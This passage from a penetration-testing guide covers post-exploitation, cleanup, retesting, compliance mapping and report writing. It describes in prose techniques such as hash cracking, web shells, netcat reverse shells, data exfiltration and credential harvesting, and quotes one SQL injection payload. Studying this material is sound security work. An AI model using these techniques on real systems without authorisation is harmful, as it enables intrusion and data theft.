Cleaning up Tracks (Interim): Real attackers cover their tracks (log editing, etc.). Testers may not extensively do this (because leaving evidence for the client can be helpful), but they might check what traces their activities left (e.g., see logs) to advise on detection capabilities. Part of post-exploitation could be noting which events were or were not detected by the organization’s monitoring.
Documenting Actions: Post-exploitation involves a lot of documentation of what’s been done: noting all compromised accounts, data accessed, and persistence methods set. This is not just for the report but also to ensure the tester can undo changes later. PTES emphasizes keeping a detailed list of actions (and times) for everything done on compromised systems , which will be given to the client to verify nothing malicious remains and to learn how to improve their detection.

Some practical examples in a web context:

After SQL injecting the database, the tester finds a table of user passwords (hashed). They might extract it and then attempt to crack those hashes offline. If successful (say many were weak MD5 hashes), they now have users’ plaintext passwords. If any of those users reuse passwords elsewhere (including possibly admin accounts on other systems), it’s a gold mine. This would be a strong post-exploitation result (demonstrating password weaknesses and the risk of reuse).
The tester uploads a web shell via an insecure file upload function (e.g., they managed to upload shell.jsp and access it). Now post-exploitation: through that shell, they enumerate the system, find an AWS CLI configuration file with credentials. They use those credentials to list S3 buckets – discovering one with sensitive files. They download a sample file to show this. Now the compromise extended to cloud storage because of that foothold.
If the web app interacts with other systems (message queues, internal APIs), the tester might use the compromised app context to call those as a malicious actor. For example, using an admin token they found, they call an internal API to fetch all customer data or issue financial transactions (if it’s a banking app).

Tools for Post-Exploitation: This phase often uses general OS tools or custom scripts rather than specialized “hacking” tools:

On a compromised server: standard command-line tools (Windows net user to create accounts, powershell scripts for deeper actions; Linux netcat for opening reverse shells out, tar/scp to exfil files).
For data search: utilities like find or grep on Linux to locate files containing certain keywords (like “password” or “SECRET_KEY”).
For pivoting: tools like ProxyChains or SSH tunnels, or Metasploit’s pivoting features, to route traffic through the compromised host.
For persistence: scripts to add services or use Metasploit’s persistence modules (again, only if agreed).
For extraction: If dealing with databases, maybe native client tools (mysqldump, pg_dump) to dump data after gaining credentials. Or even using the web app’s functionality (if it has an export feature, abuse it with admin rights).

The Purpose of Post-Exploitation is well summarized by PTES: determine the value of the compromised machine (sensitivity of data, its role in network) and maintain control for later use . For our purposes, we demonstrate what an attacker could do with the foothold. This often drives home the true business impact to stakeholders – e.g., it’s one thing to say “SQL injection allows access to the database,” but another to show “Using that access, an attacker could download the entire customer list including unencrypted credit card numbers” (which would be a clear violation of PCI-DSS and a catastrophic breach scenario).

By the end of post-exploitation, the tester has painted the full picture of the breach: initial hole -> entry -> deeper penetration -> potential damage (data theft, etc.) -> persistence. This sets the stage for the final steps of the engagement, which are cleanup (removing any artifacts left and restoring systems to pre-test state) and retesting if fixes are applied, followed by the crucial task of reporting all findings in a clear manner.

Cleanup and Retesting

After the exploits and post-exploitation activities, it’s vital to restore the target environment to its original state and ensure no harmful changes persist. The Cleanup phase involves undoing any changes the tester made and removing any artifacts left on the systems. Following cleanup (and after the client addresses the findings), Retesting is performed to verify that the vulnerabilities have been fixed properly and that no new issues have been introduced.

Cleanup: Responsible penetration testers will leave the target as they found it (with the exception of any agreed-upon changes or evidence artifacts that the client wants to keep for analysis). Cleanup tasks can include:

Removing Files and Tools: Delete any shells, scripts, or files uploaded to the target during testing. For instance, if a web shell or exploit code was placed on the server, it must be removed. If any executables or temporary files were created (like output from a tool saved on the server), those are deleted as well .
Removing User Accounts or Access: If the tester created any test user accounts (e.g., an admin account in the application or a new OS user on the server), those should be removed. Similarly, if any passwords were changed for testing purposes, revert them to original values (the client may handle that part, depending on arrangements).
Restoring Configurations: If any configuration was altered (perhaps to demonstrate something, like enabling a debug mode, or to drop a firewall temporarily for a test), set it back to original. Document any settings that could not be changed back so the client knows to handle them.
Clearing Log Entries (if agreed/necessary): Generally, testers do not tamper with logs in client environments (as it’s valuable for the client to see evidence of the attacks for learning and improving detection). However, if there was a need to avoid triggering too many alerts, sometimes testers coordinate with the client’s security team. In any case, ensure that nothing the tester did will continue to cause alarms or issues once the test is over.
Notify of Any Unintended Impact: If during testing something crashed or got altered unexpectedly (say a service needed a restart, or test data got into the database), make sure the client is aware and the issue is resolved. Pen tests can sometimes cause system instability; part of cleanup is verifying everything is operational.
Documentation for Client Verification: Provide the client a list of all changes made during the test (especially in post-exploitation) so they can double-check that all have been addressed. For instance, a list might include: “Created user pentest1 in app (now deleted), added SSH key to server (removed), wrote file /tmp/test.txt (deleted)”.

PTES specifically lists cleanup actions such as removing executables, temporary files, scripts, eliminating any rootkits or backdoors installed, and restoring settings to original values . The tester should follow that rigorously, leaving no trace except perhaps log entries.

Retesting: Once the client’s development or security team has fixed the reported vulnerabilities, a retest is usually performed (often as a separate engagement or a follow-up phase) to verify the effectiveness of the remediation. Retesting is important because fixes can sometimes be incomplete or introduce new problems . As Core Security notes, applying a patch or change doesn’t guarantee the issue is truly resolved; only a retest can confirm the vulnerability is gone and nothing else broke in the process .

Key points about retesting:

Verify Each Fix: For each major finding from the original test, the tester will attempt to reproduce the original exploit. For example, if SQL injection was found in the search field, after the fix they will try the same payload (' OR 1=1--) or variations, to ensure it no longer works (and ideally, the input is properly handled). If a certain XSS payload executed before, they try it now and confirm it’s neutralized (perhaps it’s now safely encoded or blocked).
Test for Regression: Sometimes, fixing one issue can open another. For instance, the development team might have fixed an IDOR by adding an authorization check, but maybe they inadvertently introduced a new XSS in the error page. The retest phase is a sanity check that the overall security has improved, not worsened. It’s about catching scenarios like “the quick fix solved the symptom but not the root cause” or created a different vulnerability.
Partial Retest vs Full Retest: In a time-limited engagement, retesting focuses on the issues found previously (not a full redo of the entire test). However, testers remain alert during retest for any glaring new issues. If, say, a new version of the app was deployed to fix things, the tester might do a light scan to see if anything obvious pops up (because sometimes new features or updates come along with the fix).
Documentation of Retest Results: Each finding is marked as Resolved, Partially Resolved, or Not Resolved. Partially might mean the specific example was fixed but a variant still exists (e.g., they fixed XSS in one field but another field is still vulnerable using a similar payload). This feedback is crucial for the client to finish the remediation properly.

Retesting is often highly efficient compared to the initial test. Since the tester already knows the vulnerabilities and attack paths, checking them is quick. Also, the scope is narrower. As one source points out, the second test doesn’t require exploring everything from scratch – the path of attack is known, making it faster to verify the fixes .

Importantly, retesting provides closure to the process: it validates the improved security posture and gives confidence (or indicates need for further fixes). Many compliance regimes (like PCI DSS) expect that after vulnerabilities are fixed, an organization verifies the fixes, which is essentially what retesting accomplishes.

In summary, Cleanup and Retesting ensure that the penetration test leaves the target environment unharmed and more secure:

The client is not left with any “gifts” from the tester (like shells or accounts that an actual bad guy could find),
All evidence of vulnerabilities is confirmed to be addressed.

By diligently cleaning up, testers uphold trust and professionalism. By retesting, they help close the loop, turning findings into verified improvements. Skipping retest could mean a false sense of security if something was not actually fixed. As a best practice, organizations should always incorporate a retest window after remediation – it’s the only way to confidently declare that the issues have been resolved .

Now that the technical execution of the penetration test is complete, the final – and arguably most important – phase is translating all the work and findings into a clear, actionable Report. Reporting is where the results of the test are communicated to various stakeholders, from developers who will fix the bugs to executives who need to grasp the business impact and compliance implications.

Aligning with Compliance Frameworks (ISO 27001, PCI-DSS, GDPR)

Many organizations conduct penetration tests not only for security best practices but also to meet compliance requirements or recommendations of various frameworks and regulations. It’s important to align the pen test process and outcomes with these frameworks to ensure that the organization can tick the necessary checkboxes and, more meaningfully, to improve their posture in the areas those standards emphasize. Here we discuss how a comprehensive pen test maps to ISO 27001, PCI-DSS, and GDPR, as examples:

ISO 27001 (Information Security Management System): ISO 27001 is a risk-based framework that, while not explicitly mandating penetration tests, strongly encourages regular technical vulnerability assessments as part of maintaining an effective ISMS. Control A.12.6.1 – “Management of technical vulnerabilities” in ISO 27001:2013 calls for organizations to obtain information about technical vulnerabilities, assess exposure, and take appropriate measures . A penetration test directly supports this control by simulating real-world attacks to identify vulnerabilities that automated tools or routine checks might miss . In essence, conducting pen tests demonstrates that the organization is proactive in finding and addressing weaknesses, which aligns with ISO 27001’s continuous improvement ethos. In fact, many ISO 27001 certified companies use pen testing as a key mechanism to comply with A.12.6.1 . Additionally, findings from pen tests feed into the risk assessment process (Annex A.8 and A. risk treatment plans), ensuring that high-risk vulnerabilities are logged and mitigated in the ISMS. When aligning with ISO 27001, ensure the pen test is well-documented (methodology, scope, results) because auditors may want to see evidence of testing and remediation as part of the certification audit. Regular pen testing (e.g., annually or after major changes) can be cited as a measure for ISO compliance in those areas.
PCI-DSS (Payment Card Industry Data Security Standard): PCI-DSS has explicit requirements for penetration testing for any environment that processes or stores payment card data (the Cardholder Data Environment, CDE). In PCI-DSS Requirement 11.3, organizations are required to perform penetration testing at least annually and after any significant changes to the environment . This includes testing both network-layer and application-layer defenses of the CDE . A web application that is part of card processing would fall under this. The standard also requires that discovered vulnerabilities are corrected and that testing is repeated to verify the corrections. Our described methodology (scoping through reporting) fits well with PCI’s expectations: scoping ensures the CDE components are covered; reconnaissance and vulnerability analysis find the weaknesses; exploitation demonstrates what could be done (which helps in risk ranking); and reporting provides the documentation needed for PCI compliance proof. For instance, if the penetration test finds a critical SQL injection that could expose card data, fixing it would be part of PCI compliance, since PCI prohibits storing certain data in insecure ways. The report’s remediation section can map each issue to relevant PCI controls. Example: If an admin interface was found with no multi-factor authentication, that not only is a vuln, it also violates PCI Requirement 8.x on strong access control – this would be noted. With PCI DSS 4.0 (released 2022-2024), the emphasis on testing segmentation controls and more frequent testing is even stronger . A quality pen test aligned with PCI will also check for PCI-specific issues (like ensuring no prohibited data like full track data is exposed, encryption is properly implemented, etc.). In summary, a pen test is not optional for PCI – it’s a mandatory activity , and aligning to it means being thorough in testing all in-scope systems and documenting fixes.
GDPR (General Data Protection Regulation): GDPR doesn’t explicitly mandate “thou shalt do pen tests” , but it requires that organizations handling personal data implement appropriate technical and organizational measures to secure that data (Article 32) . This includes having a process for regularly testing and assessing the effectiveness of security measures. A penetration test is an excellent way to fulfill that requirement of “regularly testing” your security . In the GDPR context, the focus is on protecting personal data from breach – pen testing helps identify routes by which personal data (names, emails, any PII) could be extracted or compromised, thereby enabling the organization to patch those and reduce breach likelihood. For GDPR alignment, it’s good to map pen test findings to GDPR implications. For example, if a vulnerability allows unauthorized retrieval of user personal details, that is a potential personal data breach scenario that would violate GDPR’s integrity and confidentiality principle (Article 5) and could lead to penalties if not addressed. Showing that you conduct pen tests can be a part of demonstrating compliance with GDPR’s Article 32 (as a “technical measure”) . Moreover, if there were ever a breach and the regulator is involved, being able to show a history of pen testing and fixing issues can be a mitigating factor, proving you took reasonable measures. In practice, many companies under GDPR include pen testing in their privacy by design approach – testing new systems before production to ensure data protection controls work. So while GDPR doesn’t demand it by name, pen testing is implicitly recommended to achieve the “state of the art” security measures that GDPR expects.

Other frameworks also benefit similarly: HIPAA (healthcare data) encourages regular risk assessments (which can include pen tests), FedRAMP for US government cloud requires periodic pen tests, etc. But focusing on ISO, PCI, and GDPR as asked:

When performing a pen test with compliance in mind, it’s wise for the tester to know any specific checks or outcomes that matter for compliance. For instance, PCI cares a lot that no system has an easily guessable default password and that encryption is properly enforced – so the tester will ensure to check those things and note them. ISO cares that there’s a defined process – the tester might ensure the findings are categorized by risk to fit into the risk treatment workflow.

Finally, in the Reporting phase (next), it’s valuable to include a section or mapping that ties each finding to relevant compliance requirements. For example, a finding of “Insecure password storage” could be mapped to ISO 27001 A.10 (Cryptography) and GDPR Article 32 (security of processing). This helps the organization see the compliance impact of each issue . A penetration testing report essentially becomes evidence for auditors and regulators that due diligence is being done .

In summary, aligning the pen test with compliance means:

Understanding the compliance goals during scoping (why the test is being done, what standards are applicable).
Conducting the test thoroughly so that it addresses areas those standards care about.
Mapping and communicating the results in terms of those standards – giving the organization not just a list of vulns, but also an understanding of how fixing them helps maintain compliance (or how not fixing them could break compliance).

This adds an extra layer of value to the penetration test, speaking the language that management and auditors listen for, and ensuring the test isn’t just a technical exercise, but a compliance enabler as well.

Reporting Results and Recommendations

The final deliverable of a penetration test is the Report, and it is often the most scrutinized part of the engagement. A well-structured report translates all the technical findings into actionable information for various audiences – from technical teams who will remediate issues to executives and compliance officers who need to understand the broader implications. A professional, instructional tone is key, as is a clear organization that allows readers to quickly find the information relevant to them.

A robust penetration test report typically contains the following sections (each serving a distinct purpose):

Executive Summary: A high-level overview of the assessment for non-technical stakeholders. This section summarizes the scope of the test, the overall security posture observed, and the key findings and recommendations in business risk terms. It should highlight the most critical vulnerabilities and their potential impact on the organization’s operations or data . For example, it might state: “The assessment of the Acme web platform revealed 3 critical, 5 high, and 10 medium vulnerabilities. Critical issues include an authentication bypass allowing admin account takeover and a SQL injection exposing customer records. If unaddressed, these could lead to massive data leakage (GDPR impact) and financial fraud. However, no evidence of prior compromise was found, and the organization showed strength in areas like network configuration and encryption.” The executive summary might also note any positive security measures in place and give a big-picture risk rating (e.g., “Overall Risk: High”). If the pen test was driven by compliance or client requirements, it can mention that too (“This test was conducted to satisfy PCI-DSS 11.3; all in-scope systems were tested, and remediation guidance is provided.”). This section should be concise (1-2 pages max) and written in non-technical language, focusing on impact and recommendations rather than technical details .
Technical Findings (with Severity Ratings): This is the core detailed section for each vulnerability discovered. Findings are typically listed individually, often ordered by severity (highest severity first). For each finding, the report provides: The findings section might be further grouped by category (e.g., authentication issues, injection issues, etc.) or just by severity. If there were many findings, sometimes low/informational ones go to an appendix, focusing the main section on the most important ones . Each finding description should be detailed enough that a developer can understand what to fix, but also succinct where possible.
- Title: A brief name, e.g., “SQL Injection in search parameter allows DB extraction”.
- Severity: Usually rated as Critical/High/Medium/Low/Informational. Some use CVSS scores or custom risk ratings considering likelihood and impact. The severity assignment should reflect both technical impact and business context. (E.g., an XSS might be high in a banking app, but medium in a brochureware site). Including severity helps the reader prioritize remediation .
- Description: A clear explanation of the vulnerability. What is it, where is it located, and why does it matter? This should be understandable by developers and security folks. Mention the affected parameters or components.
- Proof of Concept (Evidence): Showing how the tester exploited or confirmed the issue. This could include excerpts of request/response, screenshots, or code snippets. For instance, show the malicious input and the application’s error or output confirming the SQL injection. Or a screenshot of an alert box for XSS. Including evidence lends credibility and helps developers reproduce the issue. Terra Security’s guidance suggests including proof-of-exploitability for each vulnerability .
- Impact: Describe the potential impact if an attacker exploits this. E.g., “An attacker could dump the entire user database including password hashes” or “Attackers can impersonate other users, including admins, by forging this token”. Framing it in terms of data loss, reputational damage, financial cost, etc., ties it to risk.
- Likelihood (optional): Some reports discuss how difficult or likely it is to exploit, especially if using CVSS. For example, if a vuln requires auth first, mention that.
- Affected Assets/URLs: Note exactly what pages or systems are affected so the client knows where to apply fixes.
Risk Remediation Guidance: For each finding (often included directly under each finding’s details, or as a separate “Recommendations” column/section), the report should provide actionable remediation steps . This may include: Additionally, the report might include General Hardening Recommendations if patterns were noticed (e.g., “Several findings were related to outdated components; it is recommended to establish a routine patch management process”). This addresses systemic improvements beyond the individual issues.
- Short-term Fix: e.g., “Sanitize input using prepared statements to prevent SQL injection.”
- Long-term Suggestion: e.g., “Adopt an input validation library across the app” or “Implement multi-factor authentication for admin accounts to mitigate risk of credential compromise.”
- If available, reference best practices or OWASP Cheat Sheet guidance relevant to the issue. Sometimes code snippets (secure code example) are given. For example, if a hardcoded cryptographic key was found, recommendation might be “Use a secure key management system; do not hardcode keys in source – see NIST guidelines on key management.”
- Prioritization: While severity guides priority, the report might explicitly say “We recommend addressing Critical and High findings immediately (within 1-2 weeks) and Medium within 1 month, Low as part of ongoing improvements.”
- If any quick wins were observed (like a system patch that’s pending), note those.
Compliance Impact Mapping: A section or column that correlates each finding to specific compliance requirements or industry standards . For instance: This mapping is extremely helpful for organizations in regulated industries, as it connects the technical risk to compliance risk. For example, the report could have a table where columns are “Finding – Severity – Relevant Compliance Control(s) – Status”. One entry might be: “Admin Login Lacks MFA – High Severity – (PCI-DSS 8.3, ISO 27002 9.4) – Fails to meet requirement”. This acts like a stamp of whether they are compliant or not on that point . Terra Security notes that this section can serve as a ‘stamp of approval’ or highlight where compliance is not met . By providing this, the report helps compliance officers or auditors see that, say, once X vulnerability is fixed, it will bring them into compliance with control Y. If a penetration test is being evaluated by an ISO auditor, for example, they may specifically check that vulnerabilities have been addressed in light of ISO controls – the mapping makes this straightforward.
- The SQL injection finding might map to PCI-DSS Requirement 6.5 (secure coding for web apps) and GDPR Article 32 (security of processing).
- An insufficient logging issue might map to ISO 27001 A.12.4.1 (event logging) or PCI Requirement 10 (logging and monitoring).
Methodology and Tools (Appendix): Many reports include a section detailing how the test was conducted (which can be earlier in the report or in an appendix). This might include the test methodology steps (recon, scanning, etc., often to reassure that the test was comprehensive). A list of tools used can be given (e.g., “Nmap v7.93 for port scanning, Burp Suite Pro for web analysis, Nessus for vuln scanning, etc.”). Some clients want to know this to replicate tests or for transparency. This section can also cover any limitations or areas not tested due to scope restrictions.
Findings Summary (perhaps an Executive Table): Either at the start or end, a table summarizing all findings by severity. For example:

ID	Vulnerability	Severity	Status (Fixed/Not Fixed)
1	SQL Injection in Products page	Critical	Not Fixed (as of test)
2	Cross-Site Scripting in Feedback	High	Not Fixed
3	Weak Password Policy (no lockout)	Medium	Not Fixed
...	...	...	...

Such a table gives a one-glance overview for managers.
Executive Dashboard (optional): Some reports for execs have pie charts or bar graphs showing the breakdown of findings by severity, or trend compared to last test. This can be a nice visual summary.
Appendices: Any detailed output (like full Nessus scan results, or scripts output) can go here, to keep the main text cleaner. Also, things like raw request/response dumps can be put here if they were too bulky for the main finding entry. Other appendix items could include the scope details (target IPs, etc.), a glossary of terms for non-technical readers, and the action plan matrix for remediation.

In writing the report, language is key: it must be accurate but also accessible. Avoid jargon where possible or explain it (for instance, not all managers know what “XSS” means – in summary sections, call it “a code injection flaw (Cross-Site Scripting)”). Use active voice and clear statements. Instead of “It was observed that the application is vulnerable to X,” say “The application’s search field is vulnerable to XSS, which means an attacker can execute malicious script in users’ browsers.”

Also, maintain an objective and constructive tone. Avoid sounding accusatory or overly critical of the development team – focus on facts and improvements. For example, say “The login page does not implement account lockout, allowing unlimited password guesses . We recommend implementing lockout after 5 failed attempts to mitigate brute force risk,” rather than “The developers failed to implement basic account lockout.”

Finally, the report should highlight not just what’s wrong, but also what to do next. The Risk Remediation Guidance embedded or in a dedicated section is crucial to make the report actionable. Each recommendation should be specific enough to act on. For severe issues, if possible, provide multiple mitigation options (short-term patch vs long-term refactor, etc.).

Invitation to Download Templates & Cheat Sheet: To facilitate effective reporting and remediation, we have prepared a ready-to-use penetration test report template and an attack payload cheat sheet (featuring snippets like those shown in this article). These resources are designed to be adapted to your needs – you can fill in the specifics of your test into the template and use the cheat sheet as a quick reference for common attack payloads and how to detect/prevent them. We encourage readers to download these resources and tailor them for their own engagements. They serve as a starting point to ensure you don’t overlook important sections in your report and to provide consistency in testing processes. (The cheat sheet can be shared with developers as well, as a training aid on what certain attacks look like.)

In conclusion, a penetration test is only as valuable as the improvements it leads to. A clear report is the catalyst for those improvements. By following a structured approach to reporting – delivering an executive summary, detailed technical findings with severity, tailored remediation guidance, and mapping to compliance – you ensure that the hard work of the test translates into actionable intelligence. This empowers the organization to not only fix the issues found, but also to bolster their security program and compliance standing for the future . The report, combined with a solid remediation plan and retest verification, completes the A to Z cycle of the penetration test, turning identified vulnerabilities into a stronger security posture moving forward.